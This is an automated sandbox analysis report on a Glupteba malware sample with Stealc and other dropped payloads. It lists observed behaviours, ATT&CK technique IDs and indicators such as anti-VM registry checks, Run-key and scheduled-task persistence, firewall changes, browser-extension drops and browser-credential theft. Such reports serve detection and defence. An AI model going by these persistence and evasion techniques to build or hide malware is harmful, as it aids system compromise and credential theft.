glupteba | d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4

Windows Service

T1543.003

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	i5WHEvos3BIMKMpqbk2wODrZ.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ i5WHEvos3BIMKMpqbk2wODrZ.exe
Blocklisted process makes network request 3 IoCs

Processes:

ulc.3.exerundll32.exe

flow pid process

123 3204 ulc.3.exe
137 3204 ulc.3.exe
193 5648 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

2500 netsh.exe
4428 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	i5WHEvos3BIMKMpqbk2wODrZ.exe

flow	pid	process
123	3204	ulc.3.exe
137	3204	ulc.3.exe
193	5648	rundll32.exe

pid	process
2500	netsh.exe
4428	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exeInstall.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i5WHEvos3BIMKMpqbk2wODrZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i5WHEvos3BIMKMpqbk2wODrZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

v1GloRmtlH7A4ZF27q5awSsA.exeInstall.exeulc.3.exeDKanGUj.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	v1GloRmtlH7A4ZF27q5awSsA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	ulc.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	DKanGUj.exe

Drops startup file 7 IoCs

Processes:

msbuild.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LJbRIu2pCVXKEFdMDezjIokn.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoV9nPqeelROzDnfhz31XMfB.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hRsEISclko0hAwcIoZnJshZC.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DG2z39swRqYzETAkX4aZiJaG.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhc2O9UdJG2ERo97CDUIVDA0.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YorvLNmeO6cy0VDWYWpi1XCP.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wViCTUek5N8DiuvPF3ZYQ3ac.bat	msbuild.exe

Executes dropped EXE 24 IoCs

Processes:

v1GloRmtlH7A4ZF27q5awSsA.exei5WHEvos3BIMKMpqbk2wODrZ.exeLdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exeulc.0.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exeLdUE2a32dE3B01kT9zDrukhG.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exeNQoLPvoFTUXvp6rQ79vpjiOS.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.execsrss.exeulc.3.exeinjector.exeR84XgkwYCGHfoB3THGDD5mNW.exeInstall.exewindefender.exewindefender.exedfpTsVC.exeDKanGUj.exe

pid	process
768	v1GloRmtlH7A4ZF27q5awSsA.exe
4592	i5WHEvos3BIMKMpqbk2wODrZ.exe
1756	LdUE2a32dE3B01kT9zDrukhG.exe
2164	NQoLPvoFTUXvp6rQ79vpjiOS.exe
1572	ulc.0.exe
3208	pkFqx95ygiXcp9uKNIAU6KGe.exe
3748	pkFqx95ygiXcp9uKNIAU6KGe.exe
4504	pkFqx95ygiXcp9uKNIAU6KGe.exe
4364	LdUE2a32dE3B01kT9zDrukhG.exe
1164	pkFqx95ygiXcp9uKNIAU6KGe.exe
1996	pkFqx95ygiXcp9uKNIAU6KGe.exe
4804	NQoLPvoFTUXvp6rQ79vpjiOS.exe
4756	Assistant_109.0.5097.45_Setup.exe_sfx.exe
4408	assistant_installer.exe
3068	assistant_installer.exe
2604	csrss.exe
3204	ulc.3.exe
1284	injector.exe
2704	R84XgkwYCGHfoB3THGDD5mNW.exe
4860	Install.exe
2560	windefender.exe
3512	windefender.exe
5440	dfpTsVC.exe
528	DKanGUj.exe

Loads dropped DLL 10 IoCs

Processes:

pkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exeassistant_installer.exeassistant_installer.exerundll32.exe

pid	process
3208	pkFqx95ygiXcp9uKNIAU6KGe.exe
3748	pkFqx95ygiXcp9uKNIAU6KGe.exe
4504	pkFqx95ygiXcp9uKNIAU6KGe.exe
1164	pkFqx95ygiXcp9uKNIAU6KGe.exe
1996	pkFqx95ygiXcp9uKNIAU6KGe.exe
4408	assistant_installer.exe
4408	assistant_installer.exe
3068	assistant_installer.exe
3068	assistant_installer.exe
5648	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral1/memory/2560-749-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/3512-766-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/3512-840-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

NQoLPvoFTUXvp6rQ79vpjiOS.exeLdUE2a32dE3B01kT9zDrukhG.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	NQoLPvoFTUXvp6rQ79vpjiOS.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i5WHEvos3BIMKMpqbk2wODrZ.exe

Drops Chrome extension 2 IoCs

Processes:

DKanGUj.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	DKanGUj.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	DKanGUj.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

DKanGUj.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini DKanGUj.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	DKanGUj.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

pkFqx95ygiXcp9uKNIAU6KGe.exepkFqx95ygiXcp9uKNIAU6KGe.exe

description	ioc	process
File opened (read-only)	\??\D:	pkFqx95ygiXcp9uKNIAU6KGe.exe
File opened (read-only)	\??\F:	pkFqx95ygiXcp9uKNIAU6KGe.exe
File opened (read-only)	\??\D:	pkFqx95ygiXcp9uKNIAU6KGe.exe
File opened (read-only)	\??\F:	pkFqx95ygiXcp9uKNIAU6KGe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
4 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

36 api.myip.com
38 api.myip.com
39 ipinfo.io
40 ipinfo.io
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
2	pastebin.com
4	pastebin.com

flow	ioc
36	api.myip.com
38	api.myip.com
39	ipinfo.io
40	ipinfo.io

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 42 IoCs

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exepowershell.exeDKanGUj.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedfpTsVC.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	i5WHEvos3BIMKMpqbk2wODrZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	DKanGUj.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	DKanGUj.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	i5WHEvos3BIMKMpqbk2wODrZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	DKanGUj.exe
File opened for modification	C:\Windows\System32\GroupPolicy	i5WHEvos3BIMKMpqbk2wODrZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	DKanGUj.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	i5WHEvos3BIMKMpqbk2wODrZ.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	dfpTsVC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	DKanGUj.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	DKanGUj.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	dfpTsVC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	DKanGUj.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	DKanGUj.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

i5WHEvos3BIMKMpqbk2wODrZ.exe

pid process

4592 i5WHEvos3BIMKMpqbk2wODrZ.exe

pid	process
4592	i5WHEvos3BIMKMpqbk2wODrZ.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

description	pid	process	target process
PID 2156 set thread context of 2468	2156	d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe	msbuild.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

LdUE2a32dE3B01kT9zDrukhG.exeNQoLPvoFTUXvp6rQ79vpjiOS.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	LdUE2a32dE3B01kT9zDrukhG.exe
File opened (read-only)	\??\VBoxMiniRdrDN	NQoLPvoFTUXvp6rQ79vpjiOS.exe

Drops file in Program Files directory 14 IoCs

Processes:

DKanGUj.exe

description	ioc	process
File created	C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll	DKanGUj.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	DKanGUj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	DKanGUj.exe
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml	DKanGUj.exe
File created	C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\ZWZyYuD.dll	DKanGUj.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	DKanGUj.exe
File created	C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml	DKanGUj.exe
File created	C:\Program Files (x86)\DUGaRsFaSnqjC\pbtbGil.dll	DKanGUj.exe
File created	C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml	DKanGUj.exe
File created	C:\Program Files (x86)\RVqmAwyyxwiU2\pvwAWeNHfwRPL.dll	DKanGUj.exe
File created	C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml	DKanGUj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	DKanGUj.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	DKanGUj.exe
File created	C:\Program Files (x86)\ARTXeDTAxvUn\izroyMN.dll	DKanGUj.exe

Drops file in Windows directory 10 IoCs

Processes:

schtasks.execsrss.exeLdUE2a32dE3B01kT9zDrukhG.exeschtasks.exeschtasks.exeschtasks.exeNQoLPvoFTUXvp6rQ79vpjiOS.exe

description	ioc	process
File created	C:\Windows\Tasks\QhciBzJOokLnyYZub.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	LdUE2a32dE3B01kT9zDrukhG.exe
File created	C:\Windows\rss\csrss.exe	LdUE2a32dE3B01kT9zDrukhG.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File created	C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job	schtasks.exe
File created	C:\Windows\Tasks\qbSDwEgyNYPZlGA.job	schtasks.exe
File opened for modification	C:\Windows\rss	NQoLPvoFTUXvp6rQ79vpjiOS.exe
File created	C:\Windows\rss\csrss.exe	NQoLPvoFTUXvp6rQ79vpjiOS.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4744 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4368 1572 WerFault.exe ulc.0.exe
3984 768 WerFault.exe v1GloRmtlH7A4ZF27q5awSsA.exe

pid	process
4744	sc.exe

pid	pid_target	process	target process
4368	1572	WerFault.exe	ulc.0.exe
3984	768	WerFault.exe	v1GloRmtlH7A4ZF27q5awSsA.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

ulc.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ulc.3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ulc.3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ulc.3.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4780	schtasks.exe
3284	schtasks.exe
2564	schtasks.exe
5616	schtasks.exe
5948	schtasks.exe
6108	schtasks.exe
1456	schtasks.exe
1208	schtasks.exe
5552	schtasks.exe
4468	schtasks.exe
2340	schtasks.exe
6000	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

DKanGUj.exeLdUE2a32dE3B01kT9zDrukhG.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DKanGUj.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	LdUE2a32dE3B01kT9zDrukhG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
